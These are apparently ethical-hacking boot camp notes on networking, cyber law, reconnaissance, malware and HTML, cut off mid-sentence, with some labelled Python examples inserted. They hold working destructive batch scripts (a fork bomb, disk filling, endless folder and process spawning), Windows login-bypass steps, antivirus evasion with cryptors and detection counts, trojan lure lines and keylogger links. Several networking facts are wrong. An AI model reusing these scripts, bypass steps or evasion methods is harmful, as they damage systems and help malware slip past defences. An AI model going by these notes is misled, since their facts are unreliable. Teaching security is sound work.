- Boot Camp Day 1
- ===============
- Session 1
- =========
- Introduction to Information Security
- ------------------------------------
- Information
- -----------
- A collection of data that conveys a complete meaning is known as information.
- Data
- ----
- Data is raw facts and figures. It can be anything:
- Text
- Number
- Image
- Audio
- Video
- A single piece of data by itself never makes sense.
- Security
- --------
- Protecting information from leakage and breaches.
- Information
- ===========
- Personal Information
- Sensitive Information
- Financial Information
- Economic Information
- Banking Information
- Hackers
- =======
- A person who has a very high level of knowledge in the field of computers and technology:
- How a system works.
- How processes work.
- How new technologies work.
- Client-side and server-side processes.
- Hacking
- =======
- Gaining access to someone's data with or without their authorisation, legally or illegally.
- Types of Hackers
- ================
- 1. White Hat Hacker
- They work for the welfare of the organisation, and they work on its security only.
- Rahul Tyagi
- Abhijeet Singh
- Sanjeev Multani
- 2. Black Hat Hacker
- They bring chaos and destruction to the cyber world. They have only one thing in mind: money.
- Mitnick
- New Lizard Squad
- 3. Grey Hat Hacker
- A combination of both. They break into systems and expose wrongdoing. They have only one focus ---> the welfare of society and the people.
- Anonymous
- The Legions
- Hacktivism
- Julian Assange --> The Wikileaks
- Edward Snowden
- Script Kiddies
- --------------
- Copy + Paste --> Those who just use code and techniques created by others without knowing how they work.
- N00bz
- -----
- Newcomers who are just starting to learn something new in the cyber world.
- Crackers
- --------
- They are not hackers, but they are very good at cracking passwords: file passwords, folder passwords, OS passwords, email passwords.
- Why Do People Hack?
- -------------------
- Security
- Money
- Revenge
- Curiosity|knowledge
- Fame
- Zoo Zoo Hacker
- Rafi Hacker
- Cyber Crimes And Laws
- =====================
- IT Act 2000 and IT Act 2008
- There are 28 types of cyber crime, but all of them fall into these few groups:
- --> Hacking
- --> Identity Theft
- --> Insult, Online Defamation
- --> Harassment
- --> Cyber Terrorism
- Section 43:
- Penalty and compensation for damage to computer and computer system
- Section 65:
- Tampering with Computer Source Documents
- Section 66:
- Computer Related Offences
- Section 67:
- Punishment for publishing or transmitting obscene material in electronic form
- Section 71:
- Penalty For Misrepresentation
- Section 72:
- Breach of confidentiality and privacy
- Section 73:
- Penalty for publishing an electronic signature certificate that is false in certain particulars | Signature Forgery
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 2
- =========
- Network Terminology I
- ---------------------
- Network
- =======
- A connection of two or more electronic IT devices with the sole purpose of information interchange.
- Topology
- ========
- How the devices in a network are connected to each other: the physical layout of the network.
- 1. Star Topology
- ================
- All end devices are connected to a central connecting device.
- If the central device is down, communication is not possible.
- 2. Ring Topology
- ================
- When all of my end devices are connected in a closed circular chain.
- There are two ways of communication in a ring topology:
- 1. Unidirectional
- Either clockwise or anticlockwise.
- 2. Bidirectional
- Data can travel in either direction.
- 3. Mesh Topology
- ================
- Every device is connected to every other device in the network.
- 4. Bus Topology
- ===============
- All end devices are connected to a central communication line, known as the backbone.
- 5. Hybrid Topology
- ==================
- Two or more types of topology are combined in one network.
- Protocols
- =========
- A set of rules and regulations that every device must follow in order to communicate on the network.
- 1. IP --> Internet Protocol
- 2. TCP --> Transmission Control Protocol
- 3. UDP --> User Datagram Protocol
- 4. FTP --> File Transfer Protocol
- 5. HTTP --> Hyper Text Transfer Protocol
- 6. SMTP --> Simple Mail Transfer Protocol
- 7. VoIP --> Voice Over Internet Protocol
- 8. DHCP --> Dynamic Host Configuration Protocol
- IP Address
- ==========
- Internet Protocol Address
- -------------------------
- A logical address assigned to a device connected to a network or the internet so that it can communicate. It is unique within a network.
- Version of IP Address
- =====================
- 1. IPv4
- 2. IPv6
- 1. IPv4 --> Internet Protocol Version 4
- ----------------------------------------
- It is a 32-bit address, divided into 4 octets separated by periods.
- 192.168.0.28 ---> IPv4
- 4 octets --> 192|168|0|28
- Each octet is a number represented using 8 bits (0s and 1s).
- Periods --> dot(.)
- 192 = 128+64 = 11000000
- 168 = 128+32+8 = 10101000
- 0 = 00000000
- 28 = 16 + 8 + 4 = 00011100
- 128  64  32  16   8   4   2   1  | decimal
- =========================================
-   1   1   0   0   0   0   0   0  | 192
-   1   0   1   0   1   0   0   0  | 168
-   0   0   0   0   0   0   0   0  |   0
-   0   0   0   1   1   1   0   0  |  28
- 192.168.0.28 = 11000000.10101000.00000000.00011100
- It is written using decimal digits only --> 0-9
- Total Number Of IP Address --> 2^32 IP Addresses
- 0.0.0.0 - 255.255.255.255
- Classes of IPv4 Addresses
- =========================
- 1. Class A --> 0.0.0.0 - 127.255.255.255
- 2. Class B --> 128.0.0.0 - 191.255.255.255
- 3. Class C --> 192.0.0.0 - 223.255.255.255
- 4. Class D --> 224.0.0.0 - 239.255.255.255
- 5. Class E --> 240.0.0.0 - 255.255.255.255
- Class D and Class E --> reserved for military and research and development purposes.
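Worked in code, as an added example that is not part of these notes: the octet-to-binary conversion from the table above, the reverse direction, and the class lookup using the first-octet ranges listed for Class A to Class E, with validation of the 0-255 octet range.

```python
# Added example, not from the original notes: converts a dotted-quad IPv4
# address to the 32-bit binary form worked out above, converts it back, and
# classifies it using the first-octet ranges listed for Class A to Class E.

PLACE_VALUES = (128, 64, 32, 16, 8, 4, 2, 1)

# First-octet ranges exactly as given in the notes
CLASS_RANGES = {"A": (0, 127), "B": (128, 191), "C": (192, 223),
                "D": (224, 239), "E": (240, 255)}


def octet_to_bits(octet):
    """One octet -> 8-bit string, by the same subtraction the notes do by hand
    (192 = 128 + 64 -> '11000000')."""
    if not 0 <= octet <= 255:
        raise ValueError(f"octet {octet} is outside 0-255")
    bits = ""
    remaining = octet
    for value in PLACE_VALUES:
        if remaining >= value:
            bits += "1"
            remaining -= value
        else:
            bits += "0"
    return bits


def is_valid_ipv4(address):
    """True only for exactly four decimal octets, each in 0-255."""
    parts = address.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def ipv4_to_binary(address):
    """'192.168.0.28' -> '11000000.10101000.00000000.00011100'."""
    if not is_valid_ipv4(address):
        raise ValueError(f"{address!r} is not a valid IPv4 address")
    return ".".join(octet_to_bits(int(p)) for p in address.split("."))


def binary_to_ipv4(binary):
    """Reverse direction; each group must be exactly eight 0/1 characters."""
    groups = binary.split(".")
    if len(groups) != 4 or any(len(g) != 8 or set(g) - {"0", "1"} for g in groups):
        raise ValueError(f"{binary!r} is not four 8-bit groups")
    return ".".join(str(int(g, 2)) for g in groups)


def ipv4_class(address):
    """Class letter by first octet, using the notes' ranges (A: 0-127, ...)."""
    if not is_valid_ipv4(address):
        raise ValueError(f"{address!r} is not a valid IPv4 address")
    first = int(address.split(".")[0])
    for letter, (low, high) in CLASS_RANGES.items():
        if low <= first <= high:
            return letter
    raise AssertionError("unreachable: the ranges cover 0-255")


def breakdown(address):
    """Rows of the place-value table from the notes: (octet, bits)."""
    return [(int(p), octet_to_bits(int(p))) for p in address.split(".")]


if __name__ == "__main__":
    addr = "192.168.0.28"
    print(" ".join(f"{v:>3}" for v in PLACE_VALUES), "| decimal")
    for octet, bits in breakdown(addr):
        print(" ".join(f"{b:>3}" for b in bits), f"| {octet}")
    print(addr, "=", ipv4_to_binary(addr), "-> class", ipv4_class(addr))
```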
- 2. IPv6 -> Internet Protocol Version 6
- ======================================
- It is a 128-bit address, written in hexadecimal. The last 32 bits of the IPv6 address are taken from the MAC address.
- 0000:0000:0000:0000:0000:0000:0000:0000
- FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
- Total number of IPv6 --> 2^128
- 0000:fe80:0000:f68c:50ff:fe5f:9718
- 5f:97:18
- f4:8c:50:5f:97:18
- Types of IP Address
- ===================
- 1. Public IP Address | Global IP Address
- The IP address provided by the ISP (or the ISP's own address).
- Google.com --> myipaddress --> 125.63.71.34
- ipcow.com ----> 125.63.71.34
- ipchicken.com > 125.63.71.34
- User-Agent Information
- ======================
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
- Hostname = 125.63.71.34.reverse.spectranet.in
- Device = X11
- Operating System = Ubuntu
- Browser Name = Firefox
- Browser Version = 60.0
- Is Mobile Device = False
- Is Beta = False
- Screen Resolution = 1366 x 768
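Added example, not from the notes: how the Device, Operating System, Browser Name and Browser Version lines above are pulled out of a User-Agent string of this layout. The sample string is constructed in the same form; because the header is chosen by the client and can be set to anything, the parsed values are a hint for logging, not identification.

```python
import re

# Constructed sample in the same layout as the User-Agent string in the notes
SAMPLE_UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

# Layout: <lead product> (<platform tokens separated by ';'>) <trailing product tokens>
UA_LAYOUT = re.compile(r"^(?P<lead>\S+)\s*\((?P<platform>[^)]*)\)\s*(?P<tail>.*)$")


def parse_user_agent(ua):
    """Return the fields the notes derive from the header, or raise ValueError
    when the string does not follow the 'Product (platform) products' layout.
    The header is client-supplied, so nothing here is trustworthy on its own."""
    m = UA_LAYOUT.match(ua.strip())
    if not m:
        raise ValueError("User-Agent does not follow the 'Product (platform) products' layout")
    # Platform block: 'X11; Ubuntu; Linux x86_64; rv:60.0' -> device, OS, ...
    tokens = [t.strip() for t in m.group("platform").split(";") if t.strip()]
    # Trailing product tokens: 'Gecko/20100101 Firefox/60.0'; the last one names the browser
    products = [p for p in m.group("tail").split() if "/" in p]
    if not products:
        raise ValueError("no browser product token after the platform block")
    browser, version = products[-1].split("/", 1)
    return {
        "device": tokens[0] if tokens else "",
        "operating_system": tokens[1] if len(tokens) > 1 else "",
        "browser_name": browser,
        "browser_version": version,
        # 'Mobile' appears as a platform or product token on phone browsers
        "is_mobile": any("mobile" in t.lower() for t in tokens + products),
    }


if __name__ == "__main__":
    for key, value in parse_user_agent(SAMPLE_UA).items():
        print(f"{key} = {value}")
```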
- 2. Private IP Address | Local IP Address
- The IP address assigned by the router to the end devices connected within the network.
- MS-OS --> cmd ---> ipconfig
- Linux/Unix --> Terminal --> ifconfig
- ifconfig --> interface Configuration
- IP Subnetting
- =============
- Division of an IP address range into smaller sub-networks so that IP address wastage is reduced.
- NAT --> Network Address Translation
- ===================================
- A service that runs at the router so that a private IP address can be translated and mapped to the public IP address, and the public IP address back to the private one.
- https://drive.google.com/file/d/0B2xwT_-2wGTkSElEbjVxVzZXUlE1M2FXbjRHcGl1QkRqYlBR/view?usp=sharing
- DHCP
- ====
- Dynamic Host Configuration Protocol
- -----------------------------------
- A protocol that runs on the router and is responsible for allocating an IP address to each device connected to the network.
- IP-Pool
- =======
- A collection of IP addresses that can be handed out to devices.
- DHCP Server
- ===========
- The server that provides IP addresses to the devices from the IP pool.
- DHCP allocates IP addresses on the basis of a lease time period.
- MS-OS
- =====
- cmd ---> ipconfig /release
- ipconfig /renew
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 3
- =========
- Network Terminology II
- ======================
- Types Of Network
- ----------------
- 1. PAN --> Personal Area Network --> Bluetooth, ShareIt --> 1-10m
- 2. LAN --> Local Area Network --> WiFi, whole Campus --> 10m-5Km
- 3. MAN --> Metropolitan Area Network --> Whole City --> 5km-50km
- 4. WAN --> Wide Area Network --> Internet -->
- LAN --> Collection of PAN
- MAN --> Collection of LAN
- WAN --> Collection Of MAN
- 1. Intranet --> Intra -> Inside | Net -> Network
- Network infrastructure that works inside a campus and cannot be accessed by people outside the campus.
- 2. Internet --> Connection of two or more networks
- Ports
- =====
- Specific gateways via which a device can use or access an external service. There are two different types of ports:
- 1. Physical Ports
- 2. Virtual Ports
- 1. Physical Ports
- =================
- Ports that we can see and touch and take services from. They are present on the device and are used for connecting different hardware.
- USB
- Audio Jack
- HDMI
- VGA
- Charging Port
- 2. Virtual Ports
- ================
- Ports via which network services are used. They are not tangible, but external and specific services are accessed through them.
- There are 65,555+ virtual ports.
- They are also of three types:
- 1. Well-Known | Pre-Defined Ports
- 2. Registered Ports
- 3. Dynamic Ports
- 1. Well-Known | Pre-Defined Ports
- =================================
- Ports defined by the internet community for running and hosting specific services. The services assigned to these ports cannot be changed.
- 21 --> FTP
- 22 --> SSH
- 23 --> Telnet
- 80 --> HTTP
- 443 --> HTTPS
- These services can also run on other ports, but on these ports only these services will run.
- Ports in the range 1-1024 are categorised as this kind of port.
- 2. Registered Ports
- ===================
- Ports registered by particular organisations for running their specific services.
- Oracle ----> Database ---> MySQL --> 3306
- Apple -----> iPhone -----> iTunes -> 3689
- Black Berry Enterprise ---> server > 3101
- 3. Dynamic Ports
- ================
- Ports that are neither pre-defined nor registered, and can be used locally by any computer user for their own purposes.
- 1337 --> LEET port | Hacker's Port
- A computer is a dumb device. We humans remember names easily, but a computer only understands a language of numbers, so for a computer it is easier to work with a number than with a name.
- DNS
- ===
- Domain Name System|service
- ==========================
- This service maps between domain names and IP addresses and helps fetch the response for the specified request.
- www.google.com ----> Open front end of google
- 172.217.161.4 -----> Open front end of google
- www.google.co.in --> 172.217.24.227
- www.google.co.in
- in --> Indian country domain
- co --> company domain inside India
- google ----> domain whose name is google
- root ---> www|mail|drive|calendar
- Proxy
- =====
- Intermediate (dummy) servers used for hiding and masking the user's public IP address.
- kproxy.com
- ipcow.com ---> 125.63.71.34 ---> Original IP Address (Public)
- kproxy.com --> ipcow.com ---> 192.95.12.100 -> the proxy's IP Address
- VPN --> Virtual Private Network
- ===============================
- They work like proxy servers but are much more advanced than proxy servers in the following ways:
- 1. They are used to maintain the anonymity, hiding and masking IP Address
- 2. They provide the encryption of data.
- 3. They provide the tunneling.
- Secret Passage
- Connecting to the internal network of an organisation
- Services
- ========
- 1. Online Based Service ----> kproxy.com
- 2. Extension Based Service -> anonymox
- 3. Standalone Service ------> Dedicated software or hardware that provides these services.
- psiphon3
- UltraSurf
- Proxpn
- HotSpot Shield
- openVPN
- OSI Model
- =========
- Open System Interconnection Model
- ---------------------------------
- A model that was designed for communication in the network, but for well-known reasons it became a reference (ideal) model. It is not used in practice at all.
- OSI is a 7-layer model.
- 1. Physical Layer
- Responsible for physical connection and conversion of data into 0s and 1s.
- 2. Data Link Layer
- Responsible for node-to-node delivery. It is also responsible for physical addressing (MAC address).
- 3. Network Layer
- It builds the packet and adds the source and destination IP addresses.
- It also decides the route.
- 4. Transport Layer
- It is responsible for the delivery of the message.
- 5. Session Layer
- It is responsible for the connection establishment, connection authentication and connection termination.
- 6. Presentation Layer
- It is responsible for data compression, encryption and decryption of data.
- 7. Application Layer
- It determines which application handles a specific piece of data.
- TCP/IP Model
- ============
- A 4-layer model similar to the OSI model. The layers are again independent of each other, but it works much faster than the OSI model.
- Web Technology Basics
- =====================
- 1. Domain Name
- 2. Hosting Space
- 3. Server
- 4. DataBase
- 5. Technology
- Client Side
- Server Side
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 4
- =========
- Information Gathering and Digital Footprinting
- ==============================================
- Phases of hacking
- -----------------
- These phases must be followed in order to perform any kind of hacking.
- 1. Information Gathering
- 2. Scanning
- 3. Gaining Access
- 4. Maintaining Access
- 5. Covering Traces
- Information Gathering
- ---------------------
- To collect as much Information as possible about the target.
- Information Gathering
- ---------------------
-   |-- Target Specific
-   |     |-- Web Site as Target
-   |     `-- Human as Target
-   `-- Network Specific
-         |-- Basic Info. Gathering
-         `-- Advance Info. Gathering
- Information Gathering is further divided into:
- 1. Network Specific
- 2. Target Specific
- 1. Network Specific
- ===================
- To collect the information about the network
- Number Of people Connected
- IP Address allocated to the connected devices
- MAC Address
- Name Of the Vendor
- If possible --> access to shared folders
- 1. Advanced IP Scanner
- 2. Angry IP Scanner
- 3. SoftPerfect Network Scanner
- https://www.softperfect.com/products/networkscanner/
- NMAP --> Network Mapping tool
- 2. Target Specific
- ==================
- i. Web site or web application
- ii. Human Specific
- Web site or web Application
- ===========================
- IP Address
- Ping
- > 65.52.169.46
- Server Information
- Dedicated or shared
- https://www.yougetsignal.com
- Database Information
- MX and NS Records
- Name of the registrar
- Technologies
- White list and Black List
- |--> robots.txt
- https://whois.net/
- https://www.yougetsignal.com
- https://whois.icann.org/en
- https://mxtoolbox.com/
- Wappalyzer --> browser extension --> helps gather information about the technologies used behind a web site or web application.
- Online Nmap
- https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
- Human Specific
- ==============
- Social Network
- Social Networking Websites
- Linkedin
- Twitter
- Facebook
- Dating Websites
- Matrimonial Websites
- Job Portals
- Fake Surveys
- Spy Services
- ravisraaman.marines
- Tools
- =====
- Maltego
- A corporate-level information gathering tool. It helps gather information about each and every aspect of a target.
- Community Edition ---> Free
- Not all transforms work in the free edition.
- https://www.paterva.com/web7/downloads.php
- OS Login Bypass
- ===============
- When you log into the OS, Windows asks for a password at startup.
- 1. Online Method
- 2. Offline Method
- 1. Online Method
- ================
- Used to change the OS login password while the system is running, when the current password is not known. It only works on the Windows Ultimate or Professional editions.
- 1. Right click on "My Computer"
- 2. Click on "Manage"
- 3. Click on "Local Users and Groups", in the left pane
- 4. Click on "Users"
- 5. Choose the user, for whom you want to change the password.
- 6. Right Click
- 7. Set Password
- 2. Offline Method
- =================
- This is the case when the device is shut down and the group policy editor cannot be opened.
- SAM --> Security Account Manager
- C:\Windows\System32\Config\SAM
- Hiren Boot CD
- Kon Boot CD
- These are live bootable operating systems. Tools like Rufus are used to make the media bootable.
- BIOS --> Basic Input Output System
- Live OS ---> Booting from the bootable media starts the OS on the media instead of the one installed on the computer or device.
- https://ufile.io/9yr2t
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 5
- =========
- Malware Illustration
- --------------------
- Malware --> MAL + WARE
- MAL -> MALicious
- WARE -> softWARE
- Malware is malicious software that can harm a system. It can be anything: a tool, an application, a program, a file.
- Types Of Malware:
- 1. Virus
- 2. Worms
- 3. Trojan
- 4. Keyloggers
- 5. Spywares
- 6. Ransomware
- 7. Botnet
- 8. Rootkits
- 9. Adwares
- 1. VIRUS
- ========
- Vital Information Resource Under Siege
- Virus can be an application, tool, software, which can harm the system and system files of the device.
- Symptoms of virus
- Slow
- Slow Processing
- Delete
- Attribute change
- Extension Change
- Shortcut keys|Files
- It remains dormant until a user executes it; a virus needs human assistance to run.
- Batch File Virus
- ================
- 1. Infinite Folder
- ------------------
- :loop
- mkdir %random%
- goto loop
- 2. Cascading folder and file
- ----------------------------
- :rudra
- mkdir rudr
- echo Hello Boys... Me acha hu...!! >>rudr.txt
- cd rudr
- goto rudra
- 3. Space Eating Virus
- ---------------------
- echo hello>>file.txt
- :loop
- type file.txt>>file.txt
- goto loop
- 4. Process Calling
- ------------------
- :loop
- start cmd.exe /c
- goto loop
- 5. Fork Bombing
- ---------------
- %0|%0
- Polymorphic Virus
- Logic Bomb
- Boot Sector Virus
- Browser Infectious Virus
- https://lucideustech.blogspot.com/2018/04/mac-os-login-screen-bypass-with.html
- aran.kuanr@gmail.com
- aran.k.uanr@gmail.com
- ara.n.k.u.anr@gmail.com
- a.r.a.n.k.u.a.n.r@gmail.com
- 2. Keyloggers
- =============
- Applications used to capture the keystrokes typed on a device. They act as an extra layer that captures the keys and dumps them on the screen.
- 1. Online Based| Remote --> iStealer
- 2. Local Storage
- Family Key Logger
- http://www.spyarsenal.com/download.html
- BPK Keylogger
- Refog Keylogger
- Screenshotter --> whenever a key is pressed or the mouse is clicked, the application takes a screenshot.
- Screen Recorder
- 3. Ransomware
- =============
- Malware that hijacks your system and encrypts all the system files; the attacker demands a ransom to decrypt them.
- WannaCry
- Petya
- Bad Rabbit
- 4. Worms
- ========
- Malware that spreads by itself. It needs human assistance only once. Common features:
- Replication
- Copy Itself
- Spread through pen drives or mail
- It is target specific
- Conficker worm --> 1,00,000 Devices
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 6
- =========
- 5. Trojans
- ----------
- Malware that helps an attacker gain remote access to the target device. Remote Access ---> Backdooring. The attacker has access: he can download any file, upload any file, use anything and manipulate the data.
- There are two types of trojans:
- 1. Forward Connection
- 2. Reverse Connection
- 1. Forward Connection
- ---------------------
- When the attacker has the target's IP address, he can connect to the system directly. Problems:
- 1. The target keeps moving --> the IP address of the target keeps changing.
- 2. It is very hard for the attacker to obtain the target's IP address every time the target changes location.
- 2. Reverse Connection
- ---------------------
- The attacker always knows his own IP address, so he crafts an application with his own IP address embedded in it and sends it to the target. As soon as the target executes the application, the attacker receives a reverse remote connection.
- RAT --> Remote Administration|Access Tool
- These are third-party tools used for creating trojans.
- Dark Comet
- How Does Anti-Malware Work
- ==========================
- All anti-malware works on the basis of signatures. If the signature of the trojan is present in the database, the file is flagged as malware; otherwise it is treated as clean.
- How to evade Anti-Malware?
- ==========================
- If the signature can be changed, the anti-malware can be evaded. The signature of the trojan is changed so that the anti-malware no longer recognises it.
- The signature of a trojan can be changed with the help of these tools:
- 1. Binders
- 2. Cryptors
- 3. Hex Editors --> Neo Hex Editor
- 4. Obfuscators -> Red Gate SmartAssembly
- Binder and cryptor
- ==================
- Chrome Cryptor
- URGE Cryptor
- Raw --> 57/65
- Raw + Chrome Cryptor --> 35/65
- Raw + Chrome Cryptor + URGE Cryptor --> 29/60
- Raw + Chrome Cryptor + URGE Cryptor + Red Gate SmartAssembly --> 12/65
- Download and install, you will get Paytm cash back of 500/-
- Download and install the best antivirus
- Download the facebook hacker --> hack any facebook account by this application
- Download and install ---> will help you in securing your device, 100% guaranteed
- Scan the network with angry IP Scanner
- 6. Botnets
- ==========
- BOTNET = BOT + NET
- BOT = roBOT
- NET = NETwork
- It means being connected to a network and controlling many devices.
- The attacker deploys the trojan on any number of systems and devices and controls them. That whole network of infected devices is known as a botnet.
- Ares Botnet
- https://github.com/sweetsoftware/Ares
- 7. Rootkits
- ===========
- Malware that is, or can be, planted at the root of the device: administrator or kernel level.
- These attack and affect the kernel level; they are hard to find and hard to remove.
- System Protection From Malwares and Secure System Configuration
- ===============================================================
- Security
- --------
- 1. The firewall should always be enabled.
- 2. Anti-virus should always be installed and kept updated.
- 3. Apply Windows patches and updates.
- 4. Always use sandbox|Virtualised environment for analysing or running a suspicious application.
- Sandboxie --> Virtual and simulated environment for analysing
- VirtualBox simulation
- 5. EXE radar
- Configuration
- -------------
- 1. attrib --> for checking file attributes
- 2. services
- 3. Activated services
- 4. Startup Service
- msconfig ---> startup
- 5. netstat
- 6. netstat -b
- -b --> shows the executable bound to each port
- 7. netstat -ona
- -a --> all connections | -o --> owning process ID | -n --> numeric form
- 8. Firewall Rule
- https://lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html
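Added example, not from the notes or the linked post: detection logic run over constructed netstat -ona lines that picks out established sessions to hosts outside the LAN on ports other than the expected web ports and reports the owning PID, which is where tracing a reverse connection starts. The sample output, the internal address ranges and the allowed-port set are assumptions made for the example.

```python
import ipaddress

# Constructed sample of `netstat -ona` output on Windows (Proto, Local Address,
# Foreign Address, State, PID). Foreign hosts use RFC 5737 documentation ranges.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    127.0.0.1:49670        127.0.0.1:49671        ESTABLISHED     2208
  TCP    192.168.0.28:49731     203.0.113.10:1337      ESTABLISHED     4120
  TCP    192.168.0.28:49745     198.51.100.7:443       ESTABLISHED     3344
  UDP    0.0.0.0:5353           *:*                                    1188
"""

# Address ranges treated as "inside the LAN": RFC 1918, loopback, link-local (assumption)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Remote ports considered normal web traffic (assumption); anything else is reviewed
EXPECTED_REMOTE_PORTS = {80, 443}


def split_endpoint(endpoint):
    """'203.0.113.10:1337' -> ('203.0.113.10', 1337); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Turn netstat -ona lines into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = parts[:3]
        # UDP rows have no State column, so the PID is the last field either way
        state = parts[3] if proto == "TCP" else ""
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "state": state, "pid": int(parts[-1])})
    return rows


def is_internal(host):
    """True for LAN/loopback peers and for '*' or unparsable hosts."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True
    return any(addr in net for net in INTERNAL_NETS)


def suspicious_outbound(rows):
    """ESTABLISHED TCP sessions to hosts outside the LAN on unexpected ports.
    Returns (pid, host, port) so the owning process can be traced by PID."""
    found = []
    for row in rows:
        if row["proto"] != "TCP" or row["state"] != "ESTABLISHED":
            continue
        host, port = split_endpoint(row["foreign"])
        if is_internal(host) or port in EXPECTED_REMOTE_PORTS:
            continue
        found.append((row["pid"], host, port))
    return found


if __name__ == "__main__":
    for pid, host, port in suspicious_outbound(parse_netstat(SAMPLE_NETSTAT)):
        print(f"PID {pid} has an established session to {host}:{port}")
```

On a real host the text would come from running netstat -ona and the flagged PID is then looked up in Task Manager or with tasklist.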
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 7
- =========
- Introduction to web Architecture and Components
- -----------------------------------------------
- 1. Domain Name
- ---------------
- godaddy.com
- hostgator.com
- 2. Hosting Space
- ----------------
- 000webhost.com
- 3. Server
- ---------
- Applications or hardware used to run other programs: server-side programs such as PHP scripts.
- It manages the request and response.
- When a user enters something in the url bar ---> a request is generated
- At the same time, when user receives the data -> a response is received
- Servers are again of 2 types:
- 1. MS OS Based server
- IIS --> Internet Information Services
- 2. Linux Based Servers
- Apache | Tomcat
- 4. Database
- -----------
- It is known as the backbone: it stores the data of the web site or web application in tabular form.
- Database --> Tables --> Columns --> Rows (Data)
- Database is again of two type:
- 1. MS OS --> MSSQL
- 2. Linux --> MySQL
- 5. Web Technologies
- -------------------
- These are the coding or scripting languages in which the web site or web application is built.
- They are also divided into 2 types:
- 1. Client Side | Front End Scripting Language
- 2. Server Side | Back End Scripting Language
- 1. Client Side Scripting
- These provide the UI of the web site or web application: what the user sees in the web browser.
- They require just a browser to run.
- HTML
- 2. Server Side Scripting
- These run on the back end and require a server to run.
- PHP
- MS OS --> ASP.NET
- Linux --> PHP
- MS OS --> IIS + MSSQL + ASP.NET ---> Money
- Linux --> Apache|Tomcat + MySQL + php ---> Money
- Local Hosting Server
- ====================
- Using these free third-party applications, you can launch and host the application or web site on the LAN and test it there. No money is involved; the application can be tested for free.
- 1. Windows Based Server --> WAMPP
- W --> Windows
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 2. Linux Based Server --> LAMPP
- L --> Linux
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 3. Cross Platform Based Server --> XAMPP
- X --> Cross Platform
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- After Installing XAMPP
- ======================
- 1. Apache
- 2. MySQL
- We need to start these two services.
- How To Access XAMPP Server
- --------------------------
- There are 3 ways to access the XAMPP server. Open the browser and enter:
- 1. localhost
- 2. 127.0.0.1
- 3. Hosted system's IP Address
- Web Security Misconfigurations
- ------------------------------
- 1. If I do have a good firewall, I am secure.
- 2. If I do have a good IDS and IPS, I am secure.
- 3. If the web site or web application uses HTTPS, I am secure.
- HTML
- ====
- Hyper Text Markup Language
- --------------------------
- Front-end development language, which requires a browser to run.
- 1. HTML --> Everything on the front end is written inside this tag.
- <html>
- xxxxxx
- xxxxxx
- xxxxxx
- </html>
- 2. Head --> Contains the meta data
- Links to stylesheets, the title, date, etc.
- <head>
- xxxxxx
- xxxxxx
- xxxxxx
- xxxxxx
- </head>
- 3. title --> to provide the title to the tab
- <title>Name_Of_The_Title</title>
- 4. Body --> Contains the whole content of the web site or web application. It comes after the head is closed.
- <body>
- xxxxxx
- xxxxxx
- xxxxxx
- </body>
- 5. Paragraph -->
- <p>.....
- ........
- ........
- ........
- </p>
- 6. Break
- <br> --> It is a single (void) tag; it does not need a closing tag.
- 7. Heading
- There are 6 types of heading tag
- h1
- h2
- h3
- h4
- h5
- h6
- As the number increases, the font size decreases.
- 8. anchor --> to provide the hyper link to anything
- <a href="#">............</a>
- 9. Image
- <img src="">  (img is a void element: no closing </img> tag)
- 10. Form
- <form action="page to redirect to after the submit button is clicked" method="GET|POST">
- </form>
- 11. Input
- <input type="text|number|date|password" id="Unique ID" name="Name Of the Element">
- 12. iframe
- <iframe src="http://www.lucideus.com"></iframe>
- ==========
- pagee.html
- ==========
- <html>
- <head>
- <title>CII</title>
- </head>
- <body>
- <!-- headings sit outside <p>: a <p> cannot contain <h1>-<h6>, the browser would close it early -->
- <h1>Grade 2<br>
- =======</h1>
- <h2>Session 1<br>
- ---------</h2>
- <!-- the link goes inside the heading; the original closed </a> before </h3> -->
- <h3><a href="http://www.lucideus.com">Introduction To Cryptography</a><br>
- ----------------------------</h3>
- <p>
- Cryptography --> Conversion of text into another form, which is readable but
- not understandable.
- <br>
- Conversion of plain text into an encrypted text via an algorithm which uses a
- key, after transmission, decryption of the encrypted text into the plain text
- via same algorithm and the key.
- <br>
- Plain Text --> It is a normal Text, which is typed by the user. which is
- readable and understandable to everyone.<br>
- Cipher Text --> Encrypted text, which is the output of the encryption.<br>
- Encryption --> Process of converting plain text into a Cipher text, it is
